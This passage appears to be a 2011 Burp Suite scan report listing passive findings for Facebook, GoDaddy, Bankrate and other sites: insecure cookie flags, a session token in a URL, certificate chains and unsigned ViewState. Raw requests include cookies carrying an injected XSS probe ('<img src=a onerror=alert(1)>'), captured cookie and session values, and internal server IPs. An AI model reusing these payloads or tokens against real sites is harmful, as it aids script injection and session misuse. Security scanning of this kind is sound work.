Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.27
X-Cnection: close
Date: Thu, 05 May 2011 12:37:05 GMT
Content-Length: 14497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.9. https://www.facebook.com/help/contact.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /help/contact.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/contact.php?show_form=cannot_identify&flow=pw_reset HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/recover.php?locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fterms.php%3Fref%3Dpf; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.113
X-Cnection: close
Date: Thu, 05 May 2011 11:44:19 GMT
Content-Length: 23828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.10. https://www.facebook.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /login.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.128
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 16087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.11. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=Mkkns; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.66.104
X-Cnection: close
Date: Thu, 05 May 2011 02:09:53 GMT
Content-Length: 46999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

6.12. https://www.facebook.com/pages/create.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /pages/create.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.22.122
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 32123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.13. https://www.facebook.com/r.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /r.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.226.129
Connection: close
Date: Thu, 05 May 2011 10:56:58 GMT
Content-Length: 29546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.14. https://www.facebook.com/recover.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /recover.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /recover.php?locale=en_US HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fpage%3D432; act=1304613672018%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613672031%2C%22act%22%2C1304613672018%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Flogin.php%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C482%2C422%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: L=2; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=1304595854; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
Set-Cookie: W=1304595854; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.132
X-Cnection: close
Date: Thu, 05 May 2011 11:44:14 GMT
Content-Length: 18743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.15. https://www.godaddy.com/gdshop/hosting/landing.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 237966
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...

6.16. https://www.godaddy.com/gdshop/registrar/search.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Thu, 28 Apr 2011 12:17:24 GMT
Location: https://www.godaddy.com/domains/search.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FJIOEHOAAMMALPNOAONKBPHB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:23 GMT
Connection: close


6.17. https://www.godaddy.com/gdshop/website.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/website.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:25 GMT
Location: https://www.godaddy.com/hosting/website-builder.aspx?app%5Fhdr=
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=JJIOEHOAFBGIEMIAKMJJFOAB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:24 GMT
Connection: close


7. Session token in URL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /extern/login_status.php?api_key=132151116822711&app_id=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12aabd56%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13c0616c4%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23792e5e8%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d6b0d054%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24e5b0ab%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.115.59
X-Cnection: close
Date: Thu, 05 May 2011 00:57:31 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

8. SSL certificate
There are 4 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



8.1. https://www.facebook.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  www.facebook.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Sun Nov 14 18:00:00 CST 2010
Valid to:  Mon Dec 02 17:59:59 CST 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

8.2. https://www.fightmagazine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fightmagazine.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.fightmagazine.com
Issued by:  Thawte SSL CA
Valid from:  Mon Apr 04 19:00:00 CDT 2011
Valid to:  Thu May 03 18:59:59 CDT 2012

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

8.3. https://www.godaddy.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.GoDaddy.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Tue Jan 04 10:21:18 CST 2011
Valid to:  Mon Jan 14 16:28:36 CST 2013

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Thu Jun 29 12:06:20 CDT 2034

8.4. https://www.neodata.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.neodata.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.neodata.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Mon Aug 17 19:00:00 CDT 2009
Valid to:  Sun Sep 04 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

9. ASP.NET ViewState without MAC enabled
There are 5 instances of this issue:

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


9.1. http://www.bankrate.com/funnel/mortgages/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bankrate.com
Path:   /funnel/mortgages/

Request

GET /funnel/mortgages/ HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: a-brmweb02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:56:19 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:56:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link type="text/css"
...[SNIP]...
